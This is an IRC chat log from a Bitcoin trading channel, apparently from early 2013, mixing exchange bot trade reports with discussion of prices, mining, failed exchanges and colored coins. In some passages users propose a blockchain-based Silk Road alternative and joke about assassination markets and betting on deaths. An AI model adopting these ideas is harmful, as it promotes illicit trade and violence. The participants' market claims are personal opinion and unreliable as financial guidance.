12:45:30 d'oh. 1 sec. Jan 31 12:45:35 gesell: moody does have last price in the title, but only when a trade has occurred. It starts off with what you posted, then becomes "(20.60002) Bitcoin Data..." Jan 31 12:50:23 maximian now ? Jan 31 12:50:38 yep, back to normal Jan 31 12:50:43 thanks for reporting. Jan 31 12:50:57 welcome Jan 31 12:52:56 and yes, website was changed to add qty@lastprice to security pages Jan 31 12:53:50 ah cool Jan 31 12:57:55 hi again :) Jan 31 12:57:59 slave trade ? PsychoticBoy wtf are you on about ? Jan 31 12:58:11 markedathome: thanks. not seeing that happening for me yet though Jan 31 12:58:21 what browser? Jan 31 12:59:14 ;;ticker Jan 31 12:59:15 BTCUSD ticker | Best bid: 20.50002, Best ask: 20.52000, Bid-ask spread: 0.01998, Last trade: 20.50002, 24 hour volume: 55471.73385830, 24 hour low: 19.19000, 24 hour high: 20.75000, 24 hour vwap: 19.81501 Jan 31 12:59:27 hi all... what did i woke up to? Jan 31 12:59:33 markedathome: yeah, chrome. notice it works fine in safari for example Jan 31 13:00:13 jurov: asics online and hashing by jgarzik, btc up 1$ Jan 31 13:00:24 [MPEX] [S.DICE] 450 @ 0.00726822 = 3.2707 BTC [+] Jan 31 13:00:26 markedathome: or something is wrong with my crhome perhaps Jan 31 13:00:27 gesell: works on chrome for me Jan 31 13:00:32 markedathome: refreshed, now it is working Jan 31 13:00:33 funky Jan 31 13:00:34 thanks Jan 31 13:06:19 can I have a free test account for my tool development, mircea? Jan 31 13:06:50 or do you have any special test command that is accepted from any gpg key? Jan 31 13:07:16 like TEST and it replies SUCESS from any key, regardless if registered or not? Jan 31 13:07:27 Seems like it would be practical Jan 31 13:08:36 it's neither practical nor available best i can see. Jan 31 13:29:54 Namworld for one, it'd allow you to test if keys are registered. Jan 31 13:32:30 ;;later tell keefe hey, drop me a line when you're on Jan 31 13:32:31 The operation succeeded. Jan 31 13:33:49 hey guys Jan 31 13:33:58 whats the command for 30 day 7 day 24 hour Jan 31 13:34:30 also, has anyone else seen the spike in blocks/hour? Jan 31 13:34:31 !ticker m s.mpoe Jan 31 13:34:33 [MPEX:S.MPOE] 1D: 0.00064143 / 0.00066461 / 0.00067553 (1562895 shares, 1,038.72 BTC), 7D: 0.00060745 / 0.00067011 / 0.0007 (22383448 shares, 14,999.46 BTC), 30D: 0.00059445 / 0.0006563 / 0.0007 (49537424 shares, 32,511.86 BTC) Jan 31 13:34:37 ;;tslb Jan 31 13:34:41 Time since last block: 5 minutes and 39 seconds Jan 31 13:35:00 network doing 27th atm, yeah. Jan 31 13:35:31 asics? Jan 31 13:35:47 or people cranking gpu's in expectation of asics coming lol Jan 31 13:36:13 ;tslb Jan 31 13:36:15 ;;tslb Jan 31 13:36:22 Time since last block: 7 minutes and 20 seconds Jan 31 13:36:48 well it's been moving in the 18-25 range for months Jan 31 13:36:52 who knows. Jan 31 13:37:10 yeah, just curious because of the whole avalon thing Jan 31 13:37:44 !ticker [MPEX:USDBTC] Jan 31 13:37:45 Hell, ain't we about more fucked than a whore at closin' time, huh? Jan 31 13:38:03 exchange rate command? Jan 31 13:38:38 ;;ticker Jan 31 13:38:39 BTCUSD ticker | Best bid: 20.65901, Best ask: 20.67000, Bid-ask spread: 0.01099, Last trade: 20.65900, 24 hour volume: 56676.40231858, 24 hour low: 19.19000, 24 hour high: 20.75000, 24 hour vwap: 19.83916 Jan 31 13:39:36 ;;bc,24hprc Jan 31 13:39:47 ;;bc,24hprc Jan 31 13:39:49 19.81 Jan 31 13:40:18 so is there a way to get exchange rate for 1d/7d/30d ? Jan 31 13:40:47 not rly. Jan 31 13:57:11 Hmm Jan 31 13:57:16 I can't cancel orders Jan 31 13:57:27 keeps saying it cannot be done at this time and to try again later Jan 31 13:58:29 [MPEX] [S.MPOE] 1329 @ 0.0006752 = 0.8973 BTC [+] Jan 31 13:58:30 [MPEX] [S.MPOE] 1662 @ 0.00067553 = 1.1227 BTC [+] Jan 31 13:58:31 [MPEX] [S.MPOE] 7009 @ 0.00067692 = 4.7445 BTC [+] Jan 31 13:58:32 [MPEX] [S.DICE] 300 @ 0.00739499 = 2.2185 BTC [+] Jan 31 13:58:34 prolly a good idea to try again a little later Jan 31 13:59:01 Namworld, me too. get used to it :) Jan 31 14:07:00 eh Jan 31 14:07:06 well anyway Jan 31 14:07:10 I'm off for now Jan 31 14:07:12 goodbye Jan 31 14:07:20 [MPEX] [S.MPOE] 15450 @ 0.00067691 = 10.4583 BTC [-] Jan 31 14:09:13 [MPEX] [S.DICE] 1000 @ 0.00739499 = 7.395 BTC [+] Jan 31 14:11:56 [MPEX] [S.MPOE] 4321 @ 0.00067157 = 2.9019 BTC [-] Jan 31 14:11:58 [MPEX] [S.MPOE] 7503 @ 0.00067138 = 5.0374 BTC [-] Jan 31 14:13:07 [MPEX] [S.MPOE] 10497 @ 0.00067138 = 7.0475 BTC [-] Jan 31 14:13:09 [MPEX] [S.MPOE] 5900 @ 0.00066972 = 3.9513 BTC [-] Jan 31 14:13:10 [MPEX] [S.MPOE] 1853 @ 0.00066964 = 1.2408 BTC [-] Jan 31 14:14:36 [MPEX] [S.MPOE] 1000 @ 0.00067667 = 0.6767 BTC [+] Jan 31 14:17:11 [MPEX] [S.MPOE] 347 @ 0.00066964 = 0.2324 BTC [-] Jan 31 14:17:13 [MPEX] [S.MPOE] 6186 @ 0.00066754 = 4.1294 BTC [-] Jan 31 14:19:42 [MPEX] [S.MPOE] 1000 @ 0.00066703 = 0.667 BTC [-] Jan 31 14:20:19 [MPEX] [S.MPOE] 3567 @ 0.00066703 = 2.3793 BTC [-] Jan 31 14:20:21 [MPEX] [S.MPOE] 883 @ 0.00067667 = 0.5975 BTC [+] Jan 31 14:22:34 http://bitcoincharts.com/charts/chart.png?width=940&m=mtgoxUSD&SubmitButton=Draw&r=60&i=&c=0&s=&e=&Prev=&Next=&t=S&b=&a1=&m1=10&a2=&m2=25&x=0&i1=&i2=&i3=&i4=&v=1&cv=0&ps=0&l=0&p=0& Jan 31 14:22:45 bitcoin chart now officiallly looks like a ponzi. Jan 31 14:23:37 [MPEX] [S.MPOE] 1000 @ 0.00067667 = 0.6767 BTC [+] Jan 31 14:23:47 [MPEX] [S.MPOE] 6984 @ 0.00067472 = 4.7122 BTC [-] Jan 31 14:26:53 mircea_popescu: yeah, ive noticed that this jump in value doesnt really equate to massive influx of new users. for sure there are new users due to increased interest from first of year but not like what causes previous bubles. http://www.reddit.com/r/Bitcoin/comments/17kt5n/bitcoinorg_downloads_spiked_at_2011_bubble_not_now/ Jan 31 14:27:36 gesell i guess what started things was the dwindling supply of bitcoins due to reward halving a month or so ago Jan 31 14:27:37 mircea_popescu: so to me there is a lot of new activity from current and established users putting more of the weight into the play Jan 31 14:27:48 buyers msitakenly figured they can delay inversting indefintiely Jan 31 14:27:57 once the bitcoins available for sale dried up panic gripped. Jan 31 14:28:25 mircea_popescu: is that a pattern you think would repeat in 4 years at the next halving? Jan 31 14:29:11 probably not. Jan 31 14:29:22 bitcoin is still very much "nobody driven". Jan 31 14:29:24 why, becaue people will be aware of the behavior? Jan 31 14:29:37 as in, the fact that some bloke heard about it first is more important than the fact that he's smart or rich. Jan 31 14:29:50 that is changing already and in fact the random nobody will not exist in 2017. Jan 31 14:30:10 its changing in what way, financial services (such as mpex)? Jan 31 14:30:21 who is the antithesis to the random bloke here Jan 31 14:30:31 well, just, the btcs are naturally leaching towards the richer and the smarter. Jan 31 14:30:47 that's the effect of free markets, they marginalize the common man. Jan 31 14:30:53 due to financial services? what is "smarter" in this case? Jan 31 14:30:59 sdice whales? Jan 31 14:31:02 i can't define what smarter is. Jan 31 14:32:18 but a simple contrast : dude hears about bitcoin and instead of going on holiday buys himself miningrigs. Jan 31 14:32:30 another dude hears of bitcoin and decides its stupid. Jan 31 14:32:35 clearly, the first is the smarter. Jan 31 14:33:00 now, once reward halving was pinned down, the smart bought. the stupid didn't buy, because they were mommentum trading and the mommentum wasn't moving. Jan 31 14:33:27 do you think that "smarter" will require collectivism for more impact? uncompressing that: it seems that in brick and mortar finance the bigger fish execute with greater advantage. Would this wind up being true in Bitcoin in the future: those with greater BTC are "smarter"? Jan 31 14:33:29 by now mommentum is moving and they're maybe buying, but the rule is quite simple : by the time the stupid gets onboard the ship is already sinking. Jan 31 14:34:21 i don't think there's any requirement for collectivism. in fact, the main seductive guile of btc to me is how prettily it completely decouples success from any sort of collective action whatsoever. Jan 31 14:34:56 maybe i dont have my thoughts clear. im more wondering if we will start to see the little guy (even if smart in finance) feeling he can do nothing in BTC markets because he will always be out smarted by those (even with the same understanding as him in finance) that have more BTC to play Jan 31 14:35:11 i doubt that can be done in btc. Jan 31 14:35:30 as best i can guess the effect you describe is a result of the regulatory interplay in fiat. Jan 31 14:35:48 yeah i agree but... Jan 31 14:36:13 it is attractive that a lot of the regulatory weight in fiat is taken out of the picture Jan 31 14:36:26 indeed. Jan 31 14:36:27 so i also feel this huge weight lifted Jan 31 14:36:31 in this market Jan 31 14:36:43 but wondering if im getting too far ahead of my self with optimism Jan 31 14:36:49 exactly. that weight mostly consists in making it impossible for someone to dominate just because they're big. Jan 31 14:36:53 and that perhaps tradition tricks of the trade will game this market as well Jan 31 14:37:04 irl a well run bank can't compete with a "too big to fail" bank Jan 31 14:37:13 here, there's no saving you. if you fail you fail. Jan 31 14:37:22 yeah Jan 31 14:37:53 and on that note, is sdice too big to fail (in the bitcoin world)? Jan 31 14:38:02 there is this very loud but imo stupid group who claim that btc is inherently unsustainable because "they are finance experts and know how to break it" Jan 31 14:38:20 to my eyes it's much akin to the 16 yo kid that "knows hax" Jan 31 14:38:31 nothing is too big to fail. Jan 31 14:39:15 wait that is close to home. how is it like a 16yo that knows hax? Jan 31 14:39:44 heh. if indeed they could "own" bitcoin through their superior trading skills they'd be doing it, neh ? Jan 31 14:40:01 maybe they are? Jan 31 14:40:07 i'd know. Jan 31 14:40:22 (i mean wtf was all that huge option btc stuff going on at mpex in the chat log you put up on your blog) Jan 31 14:40:48 that was, as best i can guess, someone insuring a large btc obligation (via the calls) and someone trying to mommentum trade (short puts) Jan 31 14:41:09 mind that the only one time someone came close to "owning" anything was august, and if that's the case the wisdom was insider information, not smarts. Jan 31 14:41:22 other than that, the january people kinda got it on the chin, bot made 10k Jan 31 14:41:22 what was in august? Jan 31 14:41:43 http://trilema.com/2012/mpoe-rezultate-august-2012/#comment-88317 Jan 31 14:43:47 beh, wish i understood typical finance more (slow going) but interesting read Jan 31 14:44:16 basically that was when the pirate guy defaulted. Jan 31 14:44:34 if you look at the graphs, was a large chunk of btc sold off Jan 31 14:44:51 yeah got that Jan 31 14:44:53 the grapewine abuz with the theory that that's the plan, crash btc price to rebuy cheap Jan 31 14:45:01 course, if that was the plan it failed. Jan 31 14:45:01 doesnt seem to me that this could not happen again, or many times Jan 31 14:45:11 it does seem to me that it can't happen again Jan 31 14:45:26 the many idiots with large btc holdings obtained just for being here early are now mostly bankrupt Jan 31 14:45:40 im pretty sure that's the last ponzi. Jan 31 14:46:36 perhaps the last ponzi (you mean pirate) but one could still game perception to swing price (if they a legitimate, non ponzi share of perceptional influance) Jan 31 14:46:53 and use this advantage to sell high, buy low Jan 31 14:47:03 or deal with puts, calls, etc Jan 31 14:47:04 possibly. Jan 31 14:47:20 avalon could have just added a month delay perhaps Jan 31 14:47:26 "unexpectidly" Jan 31 14:47:32 if you believe in markets as the ultimate allocator of resources, then that person's gain would always be smaller than the global benefit Jan 31 14:48:13 tbh i doubt avalon turning out to be a scam tomorrow would do anything to the price. Jan 31 14:48:27 just because there are other asics in the pipe Jan 31 14:48:47 even without asics. Jan 31 14:49:01 if all of them, bfl, avalon, asicminer, etc go the way of basic Jan 31 14:49:06 what diff would it make ? Jan 31 14:49:21 true Jan 31 14:49:26 some, but not much Jan 31 14:49:35 i mean sure ppl would get excited, but so what of it ? fpga ss till hash Jan 31 14:49:36 but some could still be something one could game if they had insider information Jan 31 14:49:47 that's always the case. Jan 31 14:52:37 [MPEX] [S.MPOE] 5200 @ 0.00067192 = 3.494 BTC [-] Jan 31 14:56:37 could someone use the blockchain to sell widgets locally? That is, I sell two types of widgests: WidgetA for 1btc and WidgetB for 2btc. You want to buy WidgetA. You send 1btc to 1WidgetA1234560abcdeff rx with a message embedded where where you want it shipped. I mean, couldnt this be a service to kill silkroad? Jan 31 14:57:37 explain how the "with a message embedded where where you want it shipped" works Jan 31 14:57:53 you can embed a message in the 1btc send Jan 31 14:58:06 encrypted or whatever Jan 31 14:58:09 what is an example method to embed the message Jan 31 14:58:28 "send me to my . ktnxbai" Jan 31 14:58:49 perfectly sane to keep it public Jan 31 14:59:03 encrypted(send me to my ) Jan 31 14:59:08 yeah what encoding method are you using to embed this message in a transaction? Jan 31 14:59:24 the other thing is, how am i going to leave feedback? Jan 31 14:59:27 from here you can also build the protocol ontop of the blockchain to exchange keys Jan 31 14:59:38 sending some more coins with a note 'scam' Jan 31 14:59:39 and yeah, you might even offer optional escrow and reputational services Jan 31 14:59:39 :) Jan 31 14:59:45 oh building a protocol on top of, yeah, see namecoin, colored coins, etc Jan 31 14:59:57 yeah i know namecoin. learning about colored coins Jan 31 15:00:35 a general reputation api/protocol on the block chain letting widget providers pick their reputation provider would be wicked Jan 31 15:00:39 speaking of blockchain Jan 31 15:00:51 has kiddie porn been pushed into it yet? Jan 31 15:00:56 uch Jan 31 15:00:57 i forgot Jan 31 15:01:13 gesell: also see ripple Jan 31 15:01:18 yeah i hear the question. im sure it might be. dont want to contemplate it Jan 31 15:02:23 yeah havent looked into the technical details of how ripple uses the blockchain. but the p2p concept is clear. but its more about the 6 degrees social aspect Jan 31 15:02:35 [MPEX] [S.MPOE] 3000 @ 0.00066957 = 2.0087 BTC [-] Jan 31 15:03:37 ripple doesn't use the bitcoin blockchain, but it has its own blockchain called the "ledger" Jan 31 15:04:04 but yes you choose which issuers to deal with and how to value them versus other issuers in ripple Jan 31 15:04:20 [MPEX] [S.MPOE] 15314 @ 0.00066957 = 10.2538 BTC [-] Jan 31 15:05:16 the advantage of using The blockchain as apposed to a new one is that you can use blockchain.info for all sorts of purposes (finding WidgedA sellers, checking reputation) and its a little harder to kill blockchain.info which has plenty of legal use, than specialwidgetsellerblockchain.info. So you could basically do silkroad without Tor Jan 31 15:05:49 or at least, Tor is optional then Jan 31 15:05:49 its not a thing of 'harder to kill' Jan 31 15:06:19 satoshi said he prefers new blockchains for this sort of stuff Jan 31 15:06:20 would be like torrent Jan 31 15:06:26 kill one site 10 pops up Jan 31 15:06:35 to read the distributed blockchain file Jan 31 15:06:37 yeah well sdice told satoshi to fuck off so Jan 31 15:06:43 and then you can have local clients Jan 31 15:06:59 yeah what a slap, use his name for cred too ! Jan 31 15:07:29 heh Jan 31 15:07:43 satoshi for pres 2016, lulzsec for VP Jan 31 15:08:04 anyway Jan 31 15:08:48 kakobreklaa: what would be like torrent? Jan 31 15:08:59 kakobreklaa: a seperate blockchain for widget selling? Jan 31 15:09:05 kakobreklaa: or using the existing one Jan 31 15:09:52 if youd kill blockchain.info, 10 more would pop up, same as with torrent sites Jan 31 15:09:57 [MPEX] [S.DICE] 1650 @ 0.00739499 = 12.2017 BTC [+] Jan 31 15:10:43 i know but somehow i think if you kill the special widget blockchain front end (widgetblockchain.info) it would take a while to adjust. Jan 31 15:10:48 blockchain.info is slick, but i hate it when people think it is "official" or the only one Jan 31 15:10:57 im trying to liberate subversive services from the Tor only option Jan 31 15:12:23 i dont want to use use the or a blockchain as a database but also use it as the means for discovery of services, as well as the store and discovery for reputation Jan 31 15:12:56 would be ellegant to have all of that information in the same protocol that exchanges wealth for purchase Jan 31 15:13:34 looks like colored coins is your best bet for that, but i still don't think the bitcoin blockchain is the best place Jan 31 15:13:52 thanks for the rebase. time to dig into colored coin again Jan 31 15:23:59 gesell currently the prtoblem with bitcoin is that ther blocks are too small to contain the transactions Jan 31 15:24:12 im pretty sure your bloatyblocks with messages in them would get dropped a liot. Jan 31 15:24:52 [MPEX] [S.MPOE] 8936 @ 0.00066957 = 5.9833 BTC [-] Jan 31 15:24:54 [MPEX] [S.MPOE] 10300 @ 0.00067202 = 6.9218 BTC [+] Jan 31 15:24:55 [MPEX] [S.MPOE] 314 @ 0.00067342 = 0.2115 BTC [+] Jan 31 15:27:09 reading the colored coin pdf https://bitcoil.co.il/BitcoinX.pdf Jan 31 15:27:10 "As was widely suspected in the case of GLBSE and eventually turned out correct, the lack of track record and regulatory compliance exacerbate the risk of unclean shutdown, throwing asset issuers and holders to limbo." Jan 31 15:27:23 anyone have a good reference on the history of GLBSE and its closure? Jan 31 15:27:55 gesell: its been done to death Jan 31 15:28:14 in specific that point about "regultory compliance" id like to uncompress Jan 31 15:28:20 nefario is asked questions about regulation at a conference in london, he says "who cares, can't get me" Jan 31 15:28:26 ;;asks 20 Jan 31 15:28:28 [MPEX] [S.MPOE] 8802 @ 0.00067342 = 5.9274 BTC [+] Jan 31 15:28:28 There are currently 0 bitcoins offered at or under 20.0 USD, worth 0.0 USD in total. Jan 31 15:28:29 [MPEX] [S.MPOE] 1438 @ 0.0006769 = 0.9734 BTC [+] Jan 31 15:28:30 [MPEX] [S.MPOE] 360 @ 0.00067691 = 0.2437 BTC [+] Jan 31 15:28:36 2 weeks later he says black helicopters are after him and he shuts everything down Jan 31 15:28:41 ;;asks 21 Jan 31 15:28:44 There are currently 4974.838 bitcoins offered at or under 21.0 USD, worth 104084.623608 USD in total. Jan 31 15:29:42 [MPEX] [S.MPOE] 11100 @ 0.00066942 = 7.4306 BTC [-] Jan 31 15:30:18 pigeons: funky Jan 31 15:30:27 pigeons: black helicopters always get the best of us Jan 31 15:31:12 this was a few weeks after the SEC was investigating "bitcoin denominated securites" Jan 31 15:31:29 and they seemed more interested in glbse when interviewing folks than in pirateat40 Jan 31 15:31:36 yeah and everyone knows the SEC loves some black helicopters Jan 31 15:31:47 but there is no indication that there was any contact even with nefario by them Jan 31 15:32:19 okay Jan 31 15:33:31 guy just had a bad trip, ended up convinced "they're after him" Jan 31 15:34:08 https://bitcointalk.org/index.php?topic=140052.0 this is all sorts of funny Jan 31 15:36:38 author of colored coin argues for using bitcoin blockchain is better than deploying a new chain due to security of pooled hashrate. other options given are subject to the long tail of adoption. also, still going through it, appears to focus on tie tokens to assets. the asset of a widgetA isnt so important to me as the reputation of the source (rx addr) for widgetA. So I have to contemplate how to use colored coin for reputation. but ignorin Jan 31 15:37:54 there is some discussion on the ripple list last couple days on this, with intended application of seller reviews Jan 31 15:39:13 [BTCTC] [B.YABMC] 10 @ 0.0234 = 0.234 BTC [-] Jan 31 15:39:33 pigeons: will check it out. thanks Jan 31 15:39:41 ripple threat on bitcointalk or somewhere else? Jan 31 15:39:46 s/threat/thread Jan 31 15:39:49 [BTCTC] [B.YABMC] 29 @ 0.0233 = 0.6757 BTC [-] Jan 31 15:40:07 mjrIII, btw i just added calculator to coinbr options exercise screen, if you have bought any options you can click on Exercise and see the estimated yield. Jan 31 15:40:49 [11:04:46] mjrIII bitfloor is a bitcoinica clone running stolen code <<< you confuse it with bitfinex, no? Jan 31 15:41:30 gesell: https://groups.google.com/forum/?fromgroups#!topic/rippleusers/zntNJxjwmUs Jan 31 15:43:14 also see proposed OTC WoT v2 from #bitcoin-wot and privwiki.dreamhosters.com/wiki/Distributed_Web_of_Trust_Proposal_2 Jan 31 15:45:03 jurov ow fuck! Jan 31 15:45:13 sorry! Jan 31 15:45:24 (the bible talks about a 1000 year reign of peace and tranquility. I wonder if in the end we will realize this is dependent on the dificulting of factoring 'n' into p and q) Jan 31 15:46:08 since we're giving gesell reading lists, http://trilema.com/2013/why-i-nixed-p2p-colored-coins-and-all-that-jazz/ Jan 31 15:46:10 esp. problem 3. Jan 31 15:46:54 and unrelatedly : anyone starting any sort of business and naming it bit* bitcoin* or *coin IS AN IDIOT Jan 31 15:47:12 i can't fucking keep track of them anymore, it's all a blur. plus when i go to type into the url bar i have to type an entire word! Jan 31 15:47:16 [MPEX] [S.MPOE] 10600 @ 0.00067228 = 7.1262 BTC [+] Jan 31 15:49:31 thanks mircea_popescu and pigeons Jan 31 15:51:11 [MPEX] [S.MPOE] 24200 @ 0.00067228 = 16.2692 BTC [+] Jan 31 16:03:36 in the analogy of bitcoin as cash... Jan 31 16:03:45 if your harddrive crashes Jan 31 16:03:53 you have destroyed currency... Jan 31 16:04:06 in other words, there are bitcoins which can never be spent at this point correct? Jan 31 16:04:12 yea Jan 31 16:04:18 yes, i've contributed to them Jan 31 16:04:33 equivalent to gold in sunken pirate ships? Jan 31 16:04:49 in your imagination, sure why not Jan 31 16:04:54 that gold can be found Jan 31 16:05:13 yeah easier to find the gold than the chance of guessing the key Jan 31 16:05:18 no i know Jan 31 16:05:24 my point was not to try and find this Jan 31 16:05:32 but in how it would affect the scarcity of bitcoins Jan 31 16:05:41 not much effect really Jan 31 16:05:45 since everyone and there mom throws around the 21 million number Jan 31 16:05:55 its preety scarse as is Jan 31 16:06:00 it is Jan 31 16:06:11 just curious what effect if any that would have Jan 31 16:06:17 [MPEX] [S.MPOE] 2383 @ 0.00066942 = 1.5952 BTC [-] Jan 31 16:06:18 [MPEX] [S.MPOE] 10867 @ 0.00066624 = 7.24 BTC [-] Jan 31 16:06:21 so loosing a million coins out of 20 wont do much Jan 31 16:06:28 lol i realized if some tards succeed to get btc recognized as currency, they can be prosecuted for debasement whenever their hdd crashes without backups Jan 31 16:06:29 joker style...it's about sending a message Jan 31 16:07:14 jurov: you mean debasement as in melting down US coins? Cuz you are actually increasing the average value i would imagine Jan 31 16:07:38 yea Jan 31 16:07:39 yes, i mean it as law understands it Jan 31 16:07:45 one should get paid to destroy coins Jan 31 16:07:58 some men just want to see the world burn Jan 31 16:10:10 so frustrated with banking right now Jan 31 16:10:20 2 days to link account, 2 days to transfer Jan 31 16:13:58 +9K since the last dooglus update for S.DICE. 20K for January Jan 31 16:16:33 [MPEX] [S.MPOE] 6433 @ 0.00066624 = 4.2859 BTC [-] Jan 31 16:16:34 [MPEX] [S.MPOE] 3951 @ 0.00066611 = 2.6318 BTC [-] Jan 31 16:17:23 [MPEX] [S.MPOE] 9812 @ 0.00066611 = 6.5359 BTC [-] Jan 31 16:17:23 [MPEX] [S.MPOE] 4088 @ 0.00066566 = 2.7212 BTC [-] Jan 31 16:17:34 8h if you want a piece of dividends !! 10K S.DICE = 2BTC @15h15UTC Jan 31 16:19:14 [MPEX] [S.DICE] 200 @ 0.007261 = 1.4522 BTC [-] Jan 31 16:19:16 [MPEX] [S.DICE] 300 @ 0.00726 = 2.178 BTC [-] Jan 31 16:19:17 [MPEX] [S.DICE] 1255 @ 0.00705825 = 8.8581 BTC [-] Jan 31 16:19:18 [MPEX] [S.DICE] 1145 @ 0.00705422 = 8.0771 BTC [-] Jan 31 16:20:09 since everyone and there mom throws around the 21 million number << that number will be reached sometime in 2150 Jan 31 16:21:07 error4733 they may be a little late rthan midnight Jan 31 16:24:17 do you expect to be alive in 2150 mircea_popescu ? Jan 31 16:24:37 i have no idea Jan 31 16:24:53 tho life expectancy has been mostly growing faster than my age for the past decades. Jan 31 16:25:08 what is the bitbet.us link to if mircea_popescu lives to 2150? Jan 31 16:25:22 you can't bet on people dieing omg Jan 31 16:25:54 what are the current odds Jan 31 16:25:56 i suspect not very high. over time there will be enough ppl willing to assassinate him Jan 31 16:26:46 yes u cant, in UK Jan 31 16:26:56 actually teh number of people willing to assasinate me is probably towards the lowest historical point atm Jan 31 16:27:06 im only pissing off a buncha pasty ass computer geeks currently. Jan 31 16:27:15 that's significant downstep for me Jan 31 16:27:38 tons on queen death every year Jan 31 16:30:51 [MPEX] [S.MPOE] 4600 @ 0.00066748 = 3.0704 BTC [+] Jan 31 16:31:09 [BTCTC] [BASIC-MINING] 15 @ 0.3351 = 5.0265 BTC [-] Jan 31 16:31:10 [BTCTC] [BASIC-MINING] 2 @ 0.3301 = 0.6602 BTC [-] Jan 31 16:31:12 [BTCTC] [BASIC-MINING] 1 @ 0.33 BTC [-] Jan 31 16:31:13 [BTCTC] [BASIC-MINING] 5 @ 0.33 = 1.65 BTC [-] Jan 31 16:32:03 hmm i wonder is BASIC-MINING intended to mine with bASICs Jan 31 16:33:18 [BTCTC] [BASIC-MINING] 3 @ 0.3399 = 1.0197 BTC [+] Jan 31 16:33:20 [BTCTC] [BASIC-MINING] 1 @ 0.34 BTC [+] Jan 31 16:33:43 [MPEX] [S.MPOE] 18100 @ 0.00066748 = 12.0814 BTC [+] Jan 31 16:34:23 [MPEX] [S.MPOE] 10000 @ 0.00066748 = 6.6748 BTC [+] Jan 31 16:35:06 https://blockchain.info/charts/my-wallet-n-users Jan 31 16:35:28 new year breaks the line about. Jan 31 16:35:47 quite insane Jan 31 16:38:16 [MPEX] [S.MPOE] 4887 @ 0.00066566 = 3.2531 BTC [-] Jan 31 16:38:18 [MPEX] [S.MPOE] 5600 @ 0.00066478 = 3.7228 BTC [-] Jan 31 16:38:44 kakobreklaa mpex new accts looks similar. Jan 31 16:38:56 chart it. Jan 31 16:39:07 mm Jan 31 16:39:08 how many accounts are there? Jan 31 16:39:23 brb Jan 31 16:40:49 [BTCTC] [RSM] 89 @ 0.0091 = 0.8099 BTC [+] Jan 31 16:41:16 "(15:26:46) mircea_popescu: you can't bet on people dieing omg" seriously? isnt this why bitcoin was created in the first place https://en.wikipedia.org/wiki/Jim_Bell Jan 31 16:42:12 [BTCTC] [RSM] 20 @ 0.0092 = 0.184 BTC [+] Jan 31 16:43:55 [MPEX] [S.MPOE] 3908 @ 0.00066401 = 2.595 BTC [-] Jan 31 16:44:36 mircea_popescu: how often does the mpex RSS update. not showing a lot of recent trades Jan 31 16:45:29 i would guess every time you reload it ? Jan 31 16:46:01 3`908 S.MPOE @0.00066401 i see as most recent one. Jan 31 16:46:02 no i meant is there a delay from the values showing up here and showing up on the rss Jan 31 16:46:09 shouldn't be. Jan 31 16:46:16 okay, my client then Jan 31 16:46:17 thanks Jan 31 16:46:31 at least hacven't received any complaints on the matter so far. Jan 31 16:47:27 yeah rss thats a fail protocol Jan 31 16:47:38 which remembers me i promissed some dude ill add it to bitbet Jan 31 16:47:40 fuck. Jan 31 16:49:38 well, live.coinbr uses rss. but so far i did not notice missing trades there Jan 31 16:51:42 btw, is the assapi public? i mean, mpex side of it Jan 31 16:52:16 doesnt work that way Jan 31 16:52:39 exchanges get access to url to push trades in Jan 31 16:53:43 hmmm.. and when assbot fails,are they queued? Jan 31 16:53:48 ya Jan 31 16:55:37 [MPEX] [S.MPOE] 7600 @ 0.00066401 = 5.0465 BTC [-] Jan 31 16:59:00 [HAVELOCK] [SDICE] 6 @ 0.759 = 4.554 BTC [+] Jan 31 17:01:40 [MPEX] [S.MPOE] 2443 @ 0.00066401 = 1.6222 BTC [-] Jan 31 17:01:46 [MPEX] [S.MPOE] 7307 @ 0.00066383 = 4.8506 BTC [-] Jan 31 17:05:40 [MPEX] [S.MPOE] 5613 @ 0.00066432 = 3.7288 BTC [+] Jan 31 17:05:46 [MPEX] [S.MPOE] 5087 @ 0.00066748 = 3.3955 BTC [+] Jan 31 17:06:29 mircea_popescu: I have a present for you in your mailbox :) Jan 31 17:06:39 or something like that... Jan 31 17:13:31 [MPEX] [S.MPOE] 4400 @ 0.00066383 = 2.9209 BTC [-] Jan 31 17:17:22 [MPEX] [S.MPOE] 12053 @ 0.00066748 = 8.0451 BTC [+] Jan 31 17:17:28 [MPEX] [S.MPOE] 760 @ 0.00067067 = 0.5097 BTC [+] Jan 31 17:27:30 bleh, 21 Jan 31 17:28:09 i want to understand, but cant. not that im complaining Jan 31 17:32:45 wow Jan 31 17:33:29 it's like the market was brainwashed with the phrase 'another day, another dollar' Jan 31 17:36:19 ;;ticker Jan 31 17:36:20 BTCUSD ticker | Best bid: 20.85001, Best ask: 20.90999, Bid-ask spread: 0.05998, Last trade: 20.85001, 24 hour volume: 67820.77842782, 24 hour low: 19.39660, 24 hour high: 20.97000, 24 hour vwap: 20.09227 Jan 31 17:38:38 kakobreklaa http://trilema.com/2013/mpex-paid-accounts/ Jan 31 17:39:12 ;;ticker Jan 31 17:39:16 BTCUSD ticker | Best bid: 20.95000, Best ask: 21.00110, Bid-ask spread: 0.05110, Last trade: 21.00111, 24 hour volume: 70551.15359422, 24 hour low: 19.39660, 24 hour high: 21.00111, 24 hour vwap: 20.12700 Jan 31 17:39:29 another minute another dime more like it. Jan 31 17:40:00 Glad I took this bet http://bitbet.us/bet/175/btc-usd-at-mtgox-will-stay-above-14-88-and/ Jan 31 17:41:19 lol srsly. Jan 31 17:41:25 i considered it but passed. my loss. Jan 31 17:42:00 [HAVELOCK] [SDICE] 5 @ 0.749 = 3.745 BTC [-] Jan 31 17:43:29 [MPEX] [S.DICE] 200 @ 0.00705423 = 1.4108 BTC [+] Jan 31 17:43:31 [MPEX] [S.DICE] 155 @ 0.00705422 = 1.0934 BTC [-] Jan 31 17:45:10 mircea_popescu: you really like to use those charts now, eh? Jan 31 17:45:50 ;;ticker Jan 31 17:45:51 BTCUSD ticker | Best bid: 21.22165, Best ask: 21.26343, Bid-ask spread: 0.04178, Last trade: 21.26343, 24 hour volume: 71060.56862533, 24 hour low: 19.40450, 24 hour high: 21.26343, 24 hour vwap: 20.14486 Jan 31 17:45:56 smickles which ? Jan 31 17:51:01 ;;bc,24hprc Jan 31 17:51:02 20.12 Jan 31 17:51:12 thanks for the chart mp Jan 31 17:53:48 yee Jan 31 17:56:00 mircea_popescu: oh, i was confused. I thought that blockchain chart was one of those thinkercharts you used earlier Jan 31 17:56:08 a no Jan 31 17:56:14 but those ARE really cool Jan 31 17:56:42 oh, hey. is ther rota dead to the point that it shouldn't be mentioned in new contracts as the dispute resolution method? Jan 31 17:58:24 smickles well it's only dead to the point that i wouldn't 